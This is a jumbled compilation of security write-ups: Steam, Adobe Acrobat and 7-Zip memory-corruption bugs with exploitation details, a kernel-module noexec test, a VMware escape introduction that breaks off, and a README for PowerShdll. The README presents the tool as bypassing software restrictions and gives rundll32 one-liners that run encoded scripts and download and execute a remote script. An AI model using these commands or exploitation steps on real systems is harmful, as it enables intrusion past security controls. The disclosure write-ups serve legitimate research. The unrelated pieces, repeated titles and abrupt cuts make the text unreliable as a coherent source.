For kernel modules in general, module signing should be required by default. Module signing involves cryptographically signing kernel modules during installation and then checking the signature upon loading it into the kernel. “This allows increased kernel security by disallowing the loading of unsigned modules or modules signed with an invalid key. Module signing increases security by making it harder to load a malicious module into the kernel.

debugfs with noexec

# Mounted without noexec (default)
cat /etc/mtab | grep "debugfs"
ls -la /tmp/i_am_groot
sudo insmod test.ko
ls -la /tmp/i_am_groot
sudo rmmod test.ko
sudo rm /tmp/i_am_groot
sudo umount /sys/kernel/debug
# Mounted with noexec
sudo mount -t debugfs none -o rw,noexec /sys/kernel/debug
ls -la /tmp/i_am_groot
sudo insmod test.ko
ls -la /tmp/i_am_groot
sudo rmmod test.ko

Future Research

An obvious area to expand on this would be finding a more standard way to load programs as well as a way to load ELF files. Also, developing a kernel module that can distinctly identify custom Netfilter hooks that were loaded in from kernel modules would be useful in defeating nearly every LKM rootkit that uses Netfilter hooks.

Remote Code Execution Vulnerability in the Steam Client

Remote Code Execution Vulnerability in the Steam Client

Frag Grenade! A Remote Code Execution Vulnerability in the Steam Client

Frag Grenade! A Remote Code Execution Vulnerability in the Steam Client

This blog post explains the story behind a bug which had existed in the Steam client for at least the last ten years, and until last July would have resulted in remote code execution (RCE) in all 15 million active clients.

The keen-eyed, security conscious PC gamers amongst you may have noticed that Valve released a new update to the Steam client in recent weeks.
This blog post aims to justify why we play games in the office explain the story behind the corresponding bug, which had existed in the Steam client for at least the last ten years, and until last July would have resulted in remote code execution (RCE) in all 15 million active clients.
Since July, when Valve (finally) compiled their code with modern exploit protections enabled, it would have simply caused a client crash, with RCE only possible in combination with a separate info-leak vulnerability.
Our vulnerability was reported to Valve on the 20th February 2018 and to their credit, was fixed in the beta branch less than 12 hours later. The fix was pushed to the stable branch on the 22nd March 2018.

Overview

At its core, the vulnerability was a heap corruption within the Steam client library that could be remotely triggered, in an area of code that dealt with fragmented datagram reassembly from multiple received UDP packets.

The Steam client communicates using a custom protocol – the “Steam protocol” – which is delivered on top of UDP. There are two fields of particular interest in this protocol which are relevant to the vulnerability:

  • Packet length
  • Total reassembled datagram length

The bug was caused by the absence of a simple check to ensure that, for the first packet of a fragmented datagram, the specified packet length was less than or equal to the total datagram length. This seems like a simple oversight, given that the check was present for all subsequent packets carrying fragments of the datagram.

Without additional info-leaking bugs, heap corruptions on modern operating systems are notoriously difficult to control to the point of granting remote code execution. In this case, however, thanks to Steam’s custom memory allocator and (until last July) no ASLR on the steamclient.dll binary, this bug could have been used as the basis for a highly reliable exploit.

What follows is a technical write-up of the vulnerability and its subsequent exploitation, to the point where code execution is achieved.

Vulnerability Details

PREREQUISITE KNOWLEDGE

Protocol

The Steam protocol has been reverse engineered and well documented by others (e.g. https://imfreedom.org/wiki/Steam_Friends) from analysis of traffic generated by the Steam client. The protocol was initially documented in 2008 and has not changed significantly since then.

The protocol is implemented as a connection-orientated protocol over the top of a UDP datagram stream. The packet structure, as documented in the existing research linked above, is as follows:

Key points:

  • All packets start with the 4 bytes “VS01
  • packet_len describes the length of payload (for unfragmented datagrams, this is equal to data length)
  • type describes the type of packet, which can take the following values:
    • 0x2 Authenticating Challenge
    • 0x4 Connection Accept
    • 0x5 Connection Reset
    • 0x6 Packet is a datagram fragment
    • 0x7 Packet is a standalone datagram
  • The source and destination fields are IDs assigned to correctly route packets from multiple connections within the steam client
  • In the case of the packet being a datagram fragment:
    • split_count refers to the number of fragments that the datagram has been split up into
    • data_len refers to the total length of the reassembled datagram
  • The initial handling of these UDP packets occurs in the CUDPConnection::UDPRecvPkt function within steamclient.dll

Encryption

The payload of the datagram packet is AES-256 encrypted, using a key negotiated between the client and server on a per-session basis. Key negotiation proceeds as follows:

  • Client generates a 32-byte random AES key and RSA encrypts it with Valve’s public key before sending to the server.
  • The server, in possession of the private key, can decrypt this value and accepts it as the AES-256 key to be used for the session
  • Once the key is negotiated, all payloads sent as part of this session are encrypted using this key.

VULNERABILITY

The vulnerability exists within the RecvFragment method of the CUDPConnection class. No symbols are present in the release version of the steamclient library, however a search through the strings present in the binary will reveal a reference to “CUDPConnection::RecvFragment” in the function of interest. This function is entered when the client receives a UDP packet containing a Steam datagram of type 0x6 (Datagram fragment).

1. The function starts by checking the connection state to ensure that it is in the “Connected” state.
2. The data_len field within the Steam datagram is then inspected to ensure it contains fewer than a seemingly arbitrary 0x20000060 bytes.
3. If this check is passed, it then checks to see if the connection is already collecting fragments for a particular datagram or whether this is the first packet in the stream.

Figure 1

4. If this is the first packet in the stream, the split_count field is then inspected to see how many packets this stream is expected to span
5. If the stream is split over more than one packet, the seq_no_of_first_pkt field is inspected to ensure that it matches the sequence number of the current packet, ensuring that this is indeed the first packet in the stream.
6. The data_len field is again checked against the arbitrary limit of 0x20000060 and also the split_count is validated to be less than 0x709bpackets.

Figure 2

7. If these assertions are true, a Boolean is set to indicate we are now collecting fragments and a check is made to ensure we do not already have a buffer allocated to store the fragments.

Figure 3

8. If the pointer to the fragment collection buffer is non-zero, the current fragment collection buffer is freed and a new buffer is allocated (see yellow box in Figure 4 below). This is where the bug manifests itself. As expected, a fragment collection buffer is allocated with a size of data_lenbytes. Assuming this succeeds (and the code makes no effort to check – minor bug), then the datagram payload is then copied into this buffer using memmove, trusting the field packet_len to be the number of bytes to copy. The key oversight by the developer is that no check is made that packet_len is less than or equal to data_len. This means that it is possible to supply a data_len smaller than packet_len and have up to 64kb of data (due to the 2-byte width of the packet_len field) copied to a very small buffer, resulting in an exploitable heap corruption.

Figure 4

Exploitation

This section assumes an ASLR work-around is present, leading to the base address of steamclient.dll being known ahead of exploitation.

SPOOFING PACKETS

In order for an attacker’s UDP packets to be accepted by the client, they must observe an outbound (client->server) datagram being sent in order to learn the client/server IDs of the connection along with the sequence number. The attacker must then spoof the UDP packet source/destination IPs and ports, along with the client/server IDs and increment the observed sequence number by one.

MEMORY MANAGEMENT

For allocations larger than 1024 (0x400) bytes, the default system allocator is used. For allocations smaller or equal to 1024 bytes, Steam implements a custom allocator that works in the same way across all supported platforms. In-depth discussion of this custom allocator is beyond the scope of this blog, except for the following key points:

  1. Large blocks of memory are requested from the system allocator that are then divided into fixed-size chunks used to service memory allocation requests from the steam client.
  2. Allocations are sequential with no metadata separating the in-use chunks.
  3. Each large block maintains its own freelist, implemented as a singly linked list.
  4. The head of the freelist points to the first free chunk in a block, and the first 4-bytes of that chunk points to the next free chunk if one exists.

Allocation

When a block is allocated, the first free block is unlinked from the head of the freelist, and the first 4-bytes of this block corresponding to the next_free_block are copied into the freelist_head member variable within the allocator class.

Deallocation

When a block is freed, the freelist_head field is copied into the first 4 bytes of the block being freed (next_free_block), and the address of the block being freed is copied into the freelist_head member variable within the allocator class.

ACHIEVING A WRITE-WHAT-WHERE PRIMITIVE

The buffer overflow occurs in the heap, and depending on the size of the packets used to cause the corruption, the allocation could be controlled by either the default Windows allocator (for allocations larger than 0x400 bytes) or the custom Steam allocator (for allocations smaller than 0x400 bytes). Given the lack of security features of the custom Steam allocator, I chose this as the simpler of the two to exploit.

Referring back to the section on memory management, it is known that the head of the freelist for blocks of a given size is stored as a member variable in the allocator class, and a pointer to the next free block in the list is stored as the first 4 bytes of each free block in the list.

The heap corruption allows us to overwrite the next_free_block pointer if there is a free block adjacent to the block that the overflow occurs in. Assuming that the heap can be groomed to ensure this is the case, the overwritten next_free_block pointer can be set to an address to write to, and then a future allocation will be written to this location.

USING DATAGRAMS VS FRAGMENTS

The memory corruption bug occurs in the code responsible for processing datagram fragments (Type 6 packets). Once the corruption has occurred, the RecvFragment() function is in a state where it is expecting more fragments to arrive. However, if they do arrive, a check is made to ensure:

fragment_size + num_bytes_already_received < sizeof(collection_buffer)

This will obviously not be the case, as our first packet has already violated that assertion (the bug depends on the omission of this check) and an error condition will be raised. To avoid this, the CUDPConnection::RecvFragment() method must be avoided after memory corruption has occurred.

Thankfully, CUDPConnection::RecvDatagram() is still able to receive and process type 7 (Datagram) packets sent whilst RecvFragment() is out of action and can be used to trigger the write primitive.

THE ENCRYPTION PROBLEM

Packets being received by both RecvDatagram() and RecvFragment() are expected to be encrypted. In the case of RecvDatagram(), the decryption happens almost immediately after the packet has been received. In the case of RecvFragment(), it happens after the last fragment of the session has been received.

This presents a problem for exploitation as we do not know the encryption key, which is derived on a per-session basis. This means that any ROP code/shellcode that we send down will be ‘decrypted’ using AES256, turning our data into junk. It is therefore necessary to find a route to exploitation that occurs very soon after packet reception, before the decryption routines have a chance to run over the payload contained in the packet buffer.

ACHIEVING CODE EXECUTION

Given the encryption limitation stated above, exploitation must be achieved before any decryption is performed on the incoming data. This adds additional constraints, but is still achievable by overwriting a pointer to a CWorkThreadPool object stored in a predictable location within the data section of the binary. While the details and inner workings of this class are unclear, the name suggests it maintains a pool of threads that can be used when ‘work’ needs to be done. Inspecting some debug strings within the binary, encryption and decryption appear to be two of these work items (E.g. CWorkItemNetFilterEncryptCWorkItemNetFilterDecrypt), and so the CWorkThreadPool class would get involved when those jobs are queued. Overwriting this pointer with a location of our choice allows us to fake a vtable pointer and associated vtable, allowing us to gain execution when, for example, CWorkThreadPool::AddWorkItem() is called, which is necessarily prior to any decryption occurring.

Figure 5 shows a successful exploitation up to the point that EIP is controlled.

Figure 5

From here, a ROP chain can be created that leads to execution of arbitrary code. The video below demonstrates an attacker remotely launching the Windows calculator app on a fully patched version of Windows 10.

Conclusion

If you’ve made it to this section of the blog, thank you for sticking with it! I hope it is clear that this was a very simple bug, made relatively straightforward to exploit due to a lack of modern exploit protections. The vulnerable code was probably very old, but as it was otherwise in good working order, the developers likely saw no reason to go near it or update their build scripts. The lesson here is that as a developer it is important to periodically include aging code and build systems in your reviews to ensure they conform to modern security standards, even if the actual functionality of the code has remained unchanged. The fact that such a simple bug with such serious consequences has existed in such a popular software platform for so many years may be surprising to find in 2018 and should serve as encouragement to all vulnerability researchers to find and report more of them!

As a final note, it is worth commenting on the responsible disclosure process. This bug was disclosed to Valve in an email to their security team (security@valvesoftware.com) at around 4pm GMT and just 8 hours later a fix had been produced and pushed to the beta branch of the Steam client. As a result, Valve now hold the top spot in the (imaginary) Context fastest-to-fix leaderboard, a welcome change from the often lengthy back-and-forth process often encountered when disclosing to other vendors.

A page detailing all updates to the Steam client can be found at https://store.steampowered.com/news/38412/

RCE in Adobe Acrobat, describes the buffer overflow and shows how the researcher bypassed the original patch in a couple of hours.

Introduction

Over the past couple of years we’ve seen a spike in vulnerabilities affecting Adobe products, with Adobe Acrobat and Reader having a decent share of attention during that increase of submissions. While most of these vulnerabilities are simple file parsing issues, there have been quite a few interesting XML Forms Architecture (XFA) and JavaScript vulnerabilities, as well.

JavaScript vulnerabilities specifically have always been interesting for attackers due to the amount of control they give the attacker over the bug (allocations/frees/spraying etc.). Many vulnerabilities exist in the JavaScript engine within Acrobat, as evidenced by the 80 advisories we’ve published concerning Acrobat just this year. As such, the patches for Acrobat should be as robust as possible. However, this is not always the case.

Throughout this blog post, I will discuss a vulnerability that we received through the program (ZDI-18-173) that affected the setIntent Optional Content Groups (OCG) JavaScript function. This vulnerability is interesting because it looks similar to what we’ve been seeing in the browser world and due to the way Adobe tried to patch it.

Overview

OCGs are used to control the visibility of page contents. In Acrobat, it is possible to create and control these layers through JavaScript.

For example, we can create a simple OCG through the addWatermarkFromText function:

this.addWatermarkFromText(“AAA”);

We can retrieve the OCGs through the getOCGs function:

this.getOCGs();

OCG objects expose various properties and methods that allow us to control the layers to a certain extent. One method of interest is the setIntent method. This method is used to set the OCG intent array.

According to the JavaScript API reference, this function takes an array as an argument. We can verify this from the console:

The Bug

setIntent is implemented inside Escript.api, which is located inside the plug-ins folder in Acrobat. I won’t dig into how to locate setIntent in Escript in this blog — we’ll cover that in a future MindshaRE blog.

For now, let’s assume that we located setIntent in Escript:

I’ve removed portions of the decompiled code of the sub_238B9F62 function and only kept the portions that are relevant:

At [1] in Figure 2 above, the length property of the array is retrieved and is fully controlled by the attacker. Then at [3] in the figure above, memory is allocated based on the size computed at [2]. Finally, at [4], the length is used in a loop that overflows the allocated buffer:

The POC

Logically, any value that causes the wrap ( > 0x7FFFFFFF) takes the vulnerable code path. Hence, this fact should be taken into consideration when fixing the bug. Nevertheless, Adobe’s developers decided to take a shortcut with the patch:

They wanted to make sure that the size is not exactly 0x7FFFFFFF. Obviously, this was an inadequate response because that’s not the only value that triggers the bugs.

Once the patch was out, the researcher did not waste any time. He literally sent us the patch bypass a couple of hours later. The POC looks exactly the same as the original POC with a minor change: setting the array length with 0xFFFFFFFF instead of 0x7FFFFFFF. Again, any value greater than 0x7FFFFFFF would work. Here’s the bypass:

This time, the developers at Adobe realized that simple value checks won’t cut it and came up with the following solution to avoid the integer wrap:

Conclusion

It’s amazing how huge the attack surface is for Adobe Acrobat. It’s also amazing to think how many systems have Acrobat installed. What makes it even more interesting is the lack of advanced mitigations, which makes it relatively easier to target than other applications. Add to that some less than proper patching, and it’s easy to see why it remains a popular target for researchers.

When compared to some other vendors, there’s still a long way for Acrobat to catch up with the modern mitigation game, and we’ll be watching their improvements closely. Until then, Acrobat will likely remain an attractive target for bug hunters.

Run PowerShell with rundll32. Bypass software restrictions.

Run PowerShell with dlls only. Does not require access to powershell.exe as it uses powershell automation dlls.

Run PowerShell with dlls only. Does not require access to powershell.exe as it uses powershell automation dlls.
Run PowerShell with dlls only. Does not require access to powershell.exe as it uses powershell automation dlls.

dll mode:

Usage:
rundll32 PowerShdll,main <script>
rundll32 PowerShdll,main -f <path>       Run the script passed as argument
rundll32 PowerShdll,main -w      Start an interactive console in a new window
rundll32 PowerShdll,main -i      Start an interactive console in this console
If you do not have an interractive console, use -n to avoid crashes on output

exe mode

Usage:
PowerShdll.exe <script>
PowerShdll.exe -f <path>       Run the script passed as argument
PowerShdll.exe -i      Start an interactive console in this console

Examples

Run base64 encoded script

rundll32 Powershdll.dll,main [System.Text.Encoding]::Default.GetString([System.Convert]::FromBase64String("BASE64")) ^| iex

Note: Empire stagers need to be decoded using [System.Text.Encoding]::Unicode

Download and run script

rundll32 PowerShdll.dll,main . { iwr -useb https://website.com/Script.ps1 } ^| iex;

Requirements

  • .Net v3.5 for dll mode.
  • .Net v2.0 for exe mode.

Known Issues

Some errors do not seem to show in the output. May be confusing as commands such as Import-Module do not output an error on failure. Make sure you have typed your commands correctly.

In dll mode, interractive mode and command output rely on hijacking the parent process’ console. If the parent process does not have a console, use the -n switch to not show output otherwise the application will crash.

Due to the way Rundll32 handles arguments, using several space characters between switches and arguments may cause issues. Multiple spaces inside the scripts are okay.

7-Zip: Multiple Memory Corruptions via RAR and ZIP

Introduction

In the following, I will outline two bugs that affect 7-Zip before version 18.00 as well as p7zip. The first one (RAR PPMd) is the more critical and the more involved one. The second one (ZIP Shrink) seems to be less critical, but also much easier to understand.

Memory Corruptions via RAR PPMd (CVE-2018-5996)

7-Zip’s RAR code is mostly based on a recent UnRAR version. For version 3 of the RAR format, PPMd can be used, which is an implementation of the PPMII compression algorithm by Dmitry Shkarin. If you want to learn more about the details of PPMd and PPMII, I’d recommend Shkarin’s paper PPM: one step to practicality1.

Interestingly, the 7z archive format can be used with PPMd as well, and 7-Zip uses the same code that is used for RAR3. As a matter of fact, this is the very PPMd implementation that was used by Bitdefender in a way that caused a stack based buffer overflow.

In essence, this bug is due to improper exception handling in 7-Zip’s RAR3 handler. In particular, one might argue that it is not a bug in the PPMd code itself or in UnRAR’s extraction code.

The Bug

The RAR handler has a function NArchive::NRar::CHandler::Extract2 containing a loop that looks roughly as follows (heavily simplified!):

for (unsigned i = 0;; i++, /*OMITTED: unpack size updates*/) {
  //OMITTED: retrieve i-th item and setup input stream
  CMyComPtr<ICompressCoder> commonCoder;
  switch (item.Method) {
    case '0':
    {
      commonCoder = copyCoder;
      break;
    }
    case '1':
    case '2':
    case '3':
    case '4':
    case '5':
    {
      unsigned m;
      for (m = 0; m < methodItems.Size(); m++)
        if (methodItems[m].RarUnPackVersion == item.UnPackVersion) { break; }
      if (m == methodItems.Size()) { m = methodItems.Add(CreateCoder(/*OMITTED*/)); }
      //OMITTED: solidness check
      commonCoder = methodItems[m].Coder;
      break;
    }
    default:
      outStream.Release();
      RINOK(extractCallback->SetOperationResult(NExtract::NOperationResult::kUnsupportedMethod));
      continue;
  }
  
  HRESULT result = commonCoder->Code(inStream, outStream, &packSize, &outSize, progress);
  //OMITTED: encryptedness, outsize and crc check
  outStream.Release();

  if (result != S_OK) {
    if (result == S_FALSE) { opRes = NExtract::NOperationResult::kDataError; }
    else if (result == E_NOTIMPL) { opRes = NExtract::NOperationResult::kUnsupportedMethod; }
    else { return result; }
  }
  RINOK(extractCallback->SetOperationResult(opRes));
}

The important bit about this function is essentially that at most one coder is created for each RAR unpack version. If an archive contains multiple items that are compressed with the same RAR unpack version, those will be decoded with the same coder object.

Observe, moreover, that a call to the Code method can fail, returning the result S_FALSE, and the created coder will be reused for the next item anyway, given that the callback function does not catch this (it does not). So let us see where the error code S_FALSE may come from. The method NCompress::NRar3::CDecoder::Code3 looks as follows (again simplified):

STDMETHODIMP CDecoder::Code(ISequentialInStream *inStream, ISequentialOutStream *outStream,
    const UInt64 *inSize, const UInt64 *outSize, ICompressProgressInfo *progress) {
  try {
    if (!inSize) { return E_INVALIDARG; }
    //OMITTED: allocate and initialize VM, window and bitdecoder
    _outStream = outStream;
    _unpackSize = outSize ? *outSize : (UInt64)(Int64)-1;
    return CodeReal(progress);
  }
  catch(const CInBufferException &e)  { return e.ErrorCode; }
  catch(...) { return S_FALSE; }
}

The CInBufferException is interesting. As the name suggests, this exception may be thrown while reading from the input stream. It is not completely straightforward, but nevertheless easily possible to trigger the exception with a RAR3 archive item such that the error code is S_FALSE. I will leave it as an exercise for the interested reader to figure out the details of how this can be achieved.

Why is this interesting? Well, because in case RAR3 with PPMd is used this exception may be thrown in the middle of an update of the PPMd model, putting the soundness of the model state at risk. Recall that the same coder will be used for the next item even after a CInBufferException with error code S_FALSE has been thrown.

Note, moreover, that the RAR3 decoder holds the PPMd model state. A brief look at the method NCompress::NRar3::CDecoder::InitPPM3 reveals the fact that this model state is only reinitialized if an item explicitly requests it. This is a feature that allows to keep the same model with the collected probability heuristics between different items. But it also means that we can do the following:

  • Construct the first item of a RAR3 archive such that a CInBufferException with error code S_FALSEis thrown in the middle of a PPMd model update. Essentially, this means that we can let an arbitrary call to the Decode method of the range decoder used in Ppmd7_DecodeSymbol4 fail, jumping out of the PPMd code.
  • The subsequent item of the archive does not have the reset bit set that would cause the model to be reinitialized. Hence, the PPMd code will operate on a potentially broken model state.

So far this may not look too bad. In order to understand how this bug can be turned into attacker controlled memory corruptions, we need to understand a little bit more about the PPMd model state and how it is updated.

PPMd Preliminaries

The main idea of all PPM compression algorithms is to build a Markov model of some finite order D. In the PPMd implementation, the model state is essentially a 256-ary context tree of maximum depth D, in which the path from the root to the current context node is to be interpreted as a sequence of byte symbols. In particular, the parent relation is to be understood as a suffix relation. Additionally, every context node stores frequency statistics about possible successor symbols connected with a successor context node.

A context node is of type CPpmd7_Context, defined as follows:

typedef struct CPpmd7_Context_ {
  UInt16 NumStats;
  UInt16 SummFreq;
  CPpmd_State_Ref Stats;
  CPpmd7_Context_Ref Suffix;
} CPpmd7_Context;

The field NumStats holds the number of elements the Stats array contains5. The type CPpmd_State is defined as follows:

typedef struct {
  Byte Symbol;
  Byte Freq;
  UInt16 SuccessorLow;
  UInt16 SuccessorHigh;
} CPpmd_State;

So far, so good. Now what about the model update? I will spare you the details, describing only abstractly how a new symbol is decoded6:

  • When Ppmd7_DecodeSymbol is called, the current context is p->MinContext, which is equal to p->MaxContext, assuming a sound model state.
  • threshold value is read from the range decoder. This value is used to find a corresponding symbol in the Stats array of the current context p->MinContext.
  • If no corresponding symbol can be found, p->MinContext is moved upwards the tree (following the suffix links) until a context with (strictly) larger Stats array is found. Then, a new threshold is read and used to find a corresponding value in the current Stats array, ignoring the symbols of the contexts that have been previously visited. This process is repeated until a value is found.
  • Finally, the ranger decoder’s decode method is called, the found state is written to p->FoundState, and one of the Ppmd7_Update functions is called to update the model. As a part of this process, the UpdateModel function adds the found symbol to the Stats array of each context between p->MaxContext and p->MinContext (exclusively).

One of the key invariants the update mechanism tries to establish is that the Stats array of every context contains each of the 256 symbols at most once. However, this property only follows inductively, since there is no explicit duplicate check when a new symbol is inserted7. With the bug described above, it is easy to see how we can add duplicate symbols to Stats arrays:

  • The first RAR3 item is created such that a few context nodes are created, and the function Ppmd7_DecodeSymbol then moves p->MinContext upwards the tree at least once, until the corresponding symbol is found. Then, the subsequent call to the range decoders decode method fails with a CInBufferException.
  • The next RAR3 item does not have the reset bit set, so that we can continue with the previously created PPMd model.
  • The Ppmd7_DecodeSymbol function is entered with a fresh range decoder and p->MinContext != p->MaxContext. It finds the corresponding symbol immediately in p->MinContext. However, this symbol may now be one that already occurs in the contexts between p->MaxContext and p->MinContext. When the UpdateModel function is called, this symbol is added as a duplicate to the Stats array to each context between p->MaxContext and p->MinContext (exclusively).

Okay, so now we know how to add duplicate symbols into the Stats array. Let us see how we can make use of this to cause an actual memory corruption.

Triggering a Stack Buffer Overflow

The following code is run as a part of Ppmd7_DecodeSymbol to move the p->MinContext pointer upwards the context tree:

CPpmd_State *ps[256];
unsigned numMasked = p->MinContext->NumStats;
do {
  p->OrderFall++;
  if (!p->MinContext->Suffix) { return -1; }
  p->MinContext = Ppmd7_GetContext(p, p->MinContext->Suffix);
} while (p->MinContext->NumStats == numMasked);
UInt32 hiCnt = 0;
CPpmd_State *s = Ppmd7_GetStats(p, p->MinContext);
unsigned i = 0;
unsigned num = p->MinContext->NumStats - numMasked;
do {
  int k = (int)(MASK(s->Symbol));
  hiCnt += (s->Freq & k);
  ps[i] = s++;
  i -= k;
} while (i != num);

MASK is a macro that accesses a byte array which holds the value 0x00 at the index of each masked symbol, and the value 0xFF otherwise. Clearly, the intention is to fill the stack buffer ps with pointers to all unmasked symbol states.

Observe that the stack buffer ps has a fixed size of 256 and there is no overflow check. This means that if the Stats array contains a masked symbol multiple times, we can access the array out of bound and overflow the ps buffer.

Usually, such out of bound buffer reads make exploitation very difficult, because one cannot easily control the memory that is read. However, this is no issue in the case of PPMd, because the implementation allocates only one large pool on the heap, and then makes use of its own memory allocator to allocate all context and state structs within this pool. This ensures very quick allocation and a low memory usage, but it also allows an attacker to control the out of bound read to structures within this pool very reliably and independently of the system’s heap implementation. For example, the first RAR3 item can be constructed such that the pool is filled with the desired data, avoiding uninitialized out of bound reads.

Finally, note that the attacker can overflow the stack buffer with pointers to data that is highly attacker controlled itself.

Triggering a Heap Buffer Overflow

Building on the previous section, we now want to corrupt the heap. Perhaps not surprisingly, it is also possible to read the Stats array out of bound without overflowing the stack buffer ps. This allows us to let s point to a CPpmd_State with attacker controlled data. Since p->FoundState may be one of the psstates and the model updating process assumes that the Stats array of p->MinContext as well as its suffix contexts contain the symbol p->FoundState->Symbol.

This code fragment is part of the function UpdateModel:

do { s++; } while (s->Symbol != p->FoundState->Symbol);
if (s[0].Freq >= s[-1].Freq) {
  SwapStates(&s[0], &s[-1]);
  s--;
}

Again, there is no bound check on the Stats array, so the pointer s can be moved easily over the end of the allocated heap buffer. Optimally, we would construct our input such that s is out of bound and s-1within the allocated pool, allowing an attacker controlled heap corruption.

On Attacker Control, Exploitation and Mitigation

The 7-Zip binaries for Windows are shipped with neither the /NXCOMPAT nor the /DYNAMICBASE flags. This means effectively that 7-Zip runs without ASLR on all Windows systems, and DEP is only enabled on Windows x64 or on Windows 10 x86. For example, the following screenshot shows the most recent 7-Zip 18.00 running on a fully updated Windows 8.1 x86: 7-Zip 18.00 in Process Explorer on Windows 8.1 x86

Moreover, 7-Zip is compiled without /GS flag, so there are no stack canaries.

Since there are various ways to corrupt the stack and the heap in highly attacker controlled ways, exploitation for remote code execution is straightforward, especially if no DEP is used.

I have discussed this issue with Igor Pavlov and tried to convince him to enable all three flags. However, he refused to enable /DYNAMICBASE because he prefers to ship the binaries without relocation table to achieve a minimal binary size. Moreover, he doesn’t want to enable /GS, because it could affect the runtime as well as the binary size. At least he will try to enable /NXCOMPAT for the next release. Apparently, it is currently not enabled because 7-Zip is linked with an obsolete linker that doesn’t support the flag.

Conclusion

The outlined heap and stack memory corruptions are only scratching the surface of possible exploitation paths. Most likely there are many other and possibly even neater ways of causing memory corruptions in an attacker controlled fashion.

This bug demonstrates again how difficult it can be to integrate external code into an existing code base. In particular, handling exceptions correctly and understanding the control flow they induce can be challenging.

In the post about Bitdefender’s PPMd stack buffer overflow, I already made clear that the PPMd code is very fragile. A slight misuse of its API, or a tiny mistake while integrating it into another code base may lead to multiple dangerous memory corruptions.

If you use Shkarin’s PPMd implementation, I would strongly recommend you to harden it by adding out of bound checks wherever possible, and to make sure the basic model invariants always hold. Moreover, in case exceptions are used, one could add an additional error flag to the model that is set to true before updating the model, and only set to false after the update has been successfully completed. This should significantly mitigate the danger of corrupting the model state.

ZIP Shrink: Heap Buffer Overflow (CVE-2017-17969)

Let us proceed by discussing the other bug, which concerns ZIP Shrink. Shrink is an implementation of the Lempel-Ziv-Welch (LZW)8 compression algorithm. It has been used by PKWARE’s PKZIP before version 2.0, which was released in 1993 (sic!). In fact, shrink is so old and so rarely used, that already in 2005, when Igor Pavlov wrote 7-Zip’s shrink decoder, he had a hard time9 finding sample archives to test the code.

In essence, shrink is LZW with a dynamic code size between 9 and 13 bits, and a special feature that allows to partially clear the dictionary.

7-Zip’s shrink decoder is quite straightforward and easy to understand. In fact, it consists of only 200 lines of code. Nevertheless, it contains a buffer overflow bug.

The Bug

The shrink model’s state essentially only consists of the two arrays _parents and _suffixes, which store the LZW dictionary in a space efficient way. Moreover, there is a buffer _stack to which the current sequence is written:

  UInt16 _parents[kNumItems];
  Byte _suffixes[kNumItems];
  Byte _stack[kNumItems];

The following code fragment is part of the method NCompress::NShrink::CDecoder::CodeReal10:

unsigned cur = sym;
unsigned i = 0;
while (cur >= 256) {
  _stack[i++] = _suffixes[cur];
  cur = _parents[cur];
}

Observe that there is no bound check on the value of i.

One way this can be exploited to overflow the heap buffer _stack is by constructing a symbol of sequence such that the _parents array forms a cycle. This is possible, because the decoder only ensures that a parent node does not link to itself (cycle of length one). Interestingly, the old versions of PKZIP create shrink archives that may contain such self-linked parents, so a compatible implementation should actually accept this (7-Zip 18.00 fixes this).

Moreover, using the special symbol sequence 256,2 one can clear parent nodes in an attacker controlled fashion. A cleared parent node will be set to kNumItems. Since there is no check whether a parent has been cleared or not, the parents array can be accessed out of bound.

This sounds promising, and it is actually possible to construct archives that make the decoder write attacker controlled data out of bound. However, I didn’t find an easy way to do so without ending up in an infinite loop. This matters, because the index i is increased in every iteration of the loop. Hence, an infinite loop will quickly lead to a segmentation fault, making exploitation for code execution very difficult (if not impossible). However, I didn’t spend too much time on this, so maybe it is possible to corrupt the heap without entering an infinite loop after all.

A bunch of Red Pills: VMware Escapes

Background

VMware is one of the leaders in virtualization nowadays. They offer VMware ESXi for cloud, and VMware Workstation and Fusion for Desktops (Windows, Linux, macOS).
The technology is very well known to the public: it allows users to run unmodified guest “virtual machines”.
Often those virtual machines are not trusted, and they must be isolated.
VMware goes to a great deal to offer this isolation, especially on the ESXi product where virtual machines of different actors can potentially run on the same hardware. So a strong isolation of is paramount importance.

Recently at Pwn2Own the “Virtualization” category was introduced, and VMware was among the targets since Pwn2Own 2016.

In 2017 we successfully demonstrated a VMware escape from a guest to the host from a unprivileged account, resulting in executing code on the host, breaking out of the virtual machine.

If you escape your virtual machine environment then all isolation assurances are lost, since you are running code on the host, which controls the guests.

But how VMware works?

In a nutshell it often uses (but they are not strictly required) CPU and memory hardware virtualization technologies, so a guest virtual machine can run code at native speed most of the time.

But a modern system is not just a CPU and Memory, it also requires lot of other Hardware to work properly and be useful.

This point is very important because it will consist of one of the biggest attack surfaces of VMware: the virtualized hardware.

Virtualizing a hardware device is not a trivial task. It’s easily realized by reading any datasheet for hardware software interface for a PC hardware device.

VMware will trap on I/O access on this virtual device and it needs to emulate all those low level operations correctly, since it aims to run unmodified kernels, its emulated devices must behave as closely as possible to their real counterparts.

Furthermore if you ever used VMware you might have noticed its copy paste capabilities, and shared folders. How those are implemented?

To summarize, in this blog post we will cover quite some bugs. Both in this “backdoor” functionalities that support those “extra” services such as C&P, and one in a virtualized device.

Altough recently lot of VMware blogpost and presentations were released, we felt the need to write our own for the following reasons:

  • First, no one ever talked correctly about our Pwn2Own bugs, so we want to shed light on them.
  • Second, some of those published resources either lack of details or code.

So we hope you will enjoy our blogpost!

We will begin with some background informations to get you up to speed.

Let’s get started!

Overall architecture

A complex product like VMware consists of several components, we will just highlight the most important ones, since the VMware architecture design has already been discussed extensively elsewhere.

  • VMM: this piece of software runs at the highest possible privilege level on the physical machine. It makes the VMs tick and run and also handles all the tasks which are impossible to perform from the host ring 3 for example.
  • vmnat: vmnat is responsible for the network packet handling, since VMware offers advanced functionalities such as NAT and virtual networks.
  • vmware-vmx: every virtual machine started on the system has its own vmware-vmx process running on the host. This process handles lot of tasks which are relevant for this blogpost, including lot of the device emulation, and backdoor requests handling. The result of the exploitation of the chains we will present will result in code execution on the host in the context of vmware-vmx.

Backdoor

The so called backdoor, it’s not actually a “backdoor”, it’s simply a mechanism implemented in VMware for guest-host and host-guest communication.

A useful resource for understanding this interface is the open-vm-tools repository by VMware itself.

Basically at the lower level, the backdoor consists of 2 IO ports 0x5658 and 0x5659, the first for “traditional” communication, the other one for “high bandwidth” ones.

The guest issues in/out instructions on those ports with some registers convention and it’s able to communicate with the VMware running on the host.

The hypervisor will trap and service the request.

On top of this low level mechanism, vmware implemented some more convenient high level protocols, we encourage you to check the open-vm-tools repository to discover those since they were covered extensively elsewhere we will not spend too much time covering the details.
Just to mention a few of those higher level protocols: drag and drop, copy and paste, guestrpc.

